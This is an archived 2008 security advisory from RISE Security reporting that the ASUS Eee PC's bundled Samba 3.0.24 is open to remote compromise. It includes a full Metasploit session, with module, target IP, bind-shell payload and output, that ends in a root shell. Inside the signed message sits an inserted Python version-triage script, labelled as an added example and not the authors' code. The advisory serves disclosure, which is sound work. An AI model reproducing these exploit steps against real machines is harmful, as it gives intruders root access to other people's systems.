
asus-samba.txt

asus-samba.txt
Posted Feb 8, 2008
Site risesecurity.org

The ASUS Eee PC as shipped with Xandros comes with a vulnerable version of Samba installed that allows for remote compromise.

tags | advisory, remote
SHA-256 | 71bf7631053c3310c81d2781e3ebef3601c5cfd618b1a704d74681b7bb71fecd

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We recently acquired an ASUS Eee PC (if you want to know more about it,
a lot of reviews are available on the internet). The first thing we did when
we put our hands on the ASUS Eee PC was to test its security. The ASUS
Eee PC comes with a customized version of the Xandros operating system
installed, and some other bundled software like Mozilla Firefox, Pidgin,
Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that
caught our attention was the running smbd process (the sshd daemon was
started by us, and is not enabled by default).


eeepc-rise:/root> ps -e
PID TTY TIME CMD
1 ? 00:00:00 fastinit
2 ? 00:00:00 ksoftirqd/0
3 ? 00:00:00 events/0
4 ? 00:00:00 khelper
5 ? 00:00:00 kthread
25 ? 00:00:00 kblockd/0
26 ? 00:00:00 kacpid
128 ? 00:00:00 ata/0
129 ? 00:00:00 ata_aux
130 ? 00:00:00 kseriod
148 ? 00:00:00 pdflush
149 ? 00:00:00 pdflush
150 ? 00:00:00 kswapd0
151 ? 00:00:00 aio/0
152 ? 00:00:00 unionfs_siod/0
778 ? 00:00:00 scsi_eh_0
779 ? 00:00:00 scsi_eh_1
799 ? 00:00:00 kpsmoused
819 ? 00:00:00 kjournald
855 ? 00:00:00 fastinit
857 ? 00:00:00 sh
858 ? 00:00:00 su
859 tty3 00:00:00 getty
862 ? 00:00:00 startx
880 ? 00:00:00 xinit
881 tty2 00:00:06 Xorg
890 ? 00:00:00 udevd
952 ? 00:00:00 ksuspend_usbd
953 ? 00:00:00 khubd
1002 ? 00:00:00 acpid
1027 ? 00:00:00 pciehpd_event
1055 ? 00:00:00 ifplugd
1101 ? 00:00:00 scsi_eh_2
1102 ? 00:00:00 usb-storage
1151 ? 00:00:00 icewm
1185 ? 00:00:01 AsusLauncher
1186 ? 00:00:00 icewmtray
1188 ? 00:00:01 powermonitor
1190 ? 00:00:00 minimixer
1191 ? 00:00:00 networkmonitor
1192 ? 00:00:00 wapmonitor
1193 ? 00:00:00 x-session-manag
1195 ? 00:00:00 x-session-manag
1200 ? 00:00:00 x-session-manag
1201 ? 00:00:00 dispwatch
1217 ? 00:00:00 cupsd
1224 ? 00:00:00 usbstorageapple
1234 ? 00:00:00 kondemand/0
1240 ? 00:00:00 portmap
1248 ? 00:00:00 keyboardstatus
1272 ? 00:00:00 memd
1279 ? 00:00:00 scim-helper-man
1280 ? 00:00:00 scim-panel-gtk
1282 ? 00:00:00 scim-launcher
1297 ? 00:00:00 netserv
1331 ? 00:00:00 asusosd
1476 ? 00:00:00 xandrosncs-agen
1775 ? 00:00:00 dhclient3
2002 ? 00:00:00 nmbd
2004 ? 00:00:00 smbd
2005 ? 00:00:00 smbd
2322 ? 00:00:00 sshd
2345 ? 00:00:00 sshd
2356 pts/0 00:00:00 bash
2362 pts/0 00:00:00 ps
eeepc-rise:/root>


Retrieving the smbd version, we discovered that it is a version of Samba
vulnerable to the lsa_io_trans_names heap overflow, for which we published
an exploit last year.


eeepc-rise:/root> smbd --version
Version 3.0.24
eeepc-rise:/root>
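
The version check above is the whole triage step, so here is it written out as a small script: an added example, not RISE Security's code. It assumes the lsa_io_trans_names heap overflow affects upstream Samba 3.0.0 through 3.0.24 and was fixed in 3.0.25, that `smbd --version` prints "Version X.Y.Z" as it does on the Eee PC, and it uses a constructed `ps -e` excerpt modelled on the listing in the post. Vendor packages can backport the fix without bumping the upstream number, so a version match is a lead to confirm against the packager revision, not proof of exploitability; the script keeps that suffix for the analyst rather than guessing.

```python
"""Triage helper for the Samba version finding in the post above.

Added example, not RISE Security's code. Assumptions: the
lsa_io_trans_names heap overflow affects Samba 3.0.0 through 3.0.24 and
was fixed upstream in 3.0.25; `smbd --version` prints "Version X.Y.Z".
A packager suffix (e.g. "-6etch4") may carry a backported fix, so the
upstream range check is a lead, not a verdict on exploitability.
"""
import re
from typing import Dict, List, Optional, Tuple

# Upstream range the advisory's exploit targets (assumption stated above).
FIRST_AFFECTED = (3, 0, 0, "")
FIRST_FIXED = (3, 0, 25, "")

# Matches "3.0.24", "3.0.25a" and "3.0.24-6etch4", keeping any packager suffix.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]?)(?:-(\S+))?")

Version = Tuple[int, int, int, str]


def parse_samba_version(text: str) -> Optional[Tuple[Version, str]]:
    """Pull (major, minor, patch, letter) plus the packager suffix (may be "")
    out of `smbd --version` output or an SMB native-LAN-manager banner."""
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch, letter, suffix = m.groups()
    return (int(major), int(minor), int(patch), letter), (suffix or "")


def is_affected(version: Version) -> bool:
    """Upstream range check. Tuple comparison handles the trailing letter:
    3.0.25a sorts after 3.0.25 and is therefore outside the range."""
    return FIRST_AFFECTED <= version < FIRST_FIXED


def find_samba_daemons(ps_output: str) -> List[Tuple[int, str]]:
    """Return (pid, name) for smbd/nmbd rows in `ps -e` style output."""
    found = []
    for line in ps_output.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[0].isdigit() and fields[3] in ("smbd", "nmbd"):
            found.append((int(fields[0]), fields[3]))
    return found


def triage(ps_output: str, version_output: str) -> Dict[str, object]:
    """Combine both observations into one verdict the analyst can act on."""
    daemons = find_samba_daemons(ps_output)
    parsed = parse_samba_version(version_output)
    if parsed is None:
        return {"daemons": daemons, "version": None, "suffix": "",
                "affected_upstream": False,
                "verdict": "could not parse a Samba version"}
    version, suffix = parsed
    affected = is_affected(version)
    if affected and daemons:
        verdict = ("smbd running with an affected upstream version; confirm the "
                   "packager revision is unpatched, then stop or update the service")
    elif affected:
        verdict = "affected upstream version installed but no smbd/nmbd running"
    else:
        verdict = "version outside the affected range"
    return {"daemons": daemons, "version": version, "suffix": suffix,
            "affected_upstream": affected, "verdict": verdict}


# Constructed sample input, abbreviated from the listings in the post.
SAMPLE_PS = """PID TTY TIME CMD
1 ? 00:00:00 fastinit
1240 ? 00:00:00 portmap
2002 ? 00:00:00 nmbd
2004 ? 00:00:00 smbd
2005 ? 00:00:00 smbd
2322 ? 00:00:00 sshd
"""
SAMPLE_VERSION = "Version 3.0.24\n"

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PS, SAMPLE_VERSION).items():
        print(f"{key}: {value}")
```

Run against the sample input it reports the three Samba daemons from the post and an affected upstream version; on a Debian-derived box the returned `suffix` is what you check against the distribution's own security bulletin before concluding the host is exploitable.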


With this information, we ran our exploit against the ASUS Eee PC using
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
Debian based).


msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
RHOST => 192.168.50.10
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

Id Name
-- ----
0 Linux vsyscall
1 Linux Heap Brute Force (Debian/Ubuntu)
2 Linux Heap Brute Force (Gentoo)
3 Linux Heap Brute Force (Mandriva)
4 Linux Heap Brute Force (RHEL/CentOS)
5 Linux Heap Brute Force (SUSE)
6 Linux Heap Brute Force (Slackware)
7 DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux
id
uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)


Easy to learn, Easy to work, Easy to root.


The original blog post and more information can be found in our
website at http://risesecurity.org/.

Best regards,
RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHrIdmhFjK78TGSUERAnQRAKC+y18h92I4cTnjmDJkTKfdtbno2ACgkdqs
v7aF1eU5H9uSfL4zU5AWCB4=
=pDq2
-----END PGP SIGNATURE-----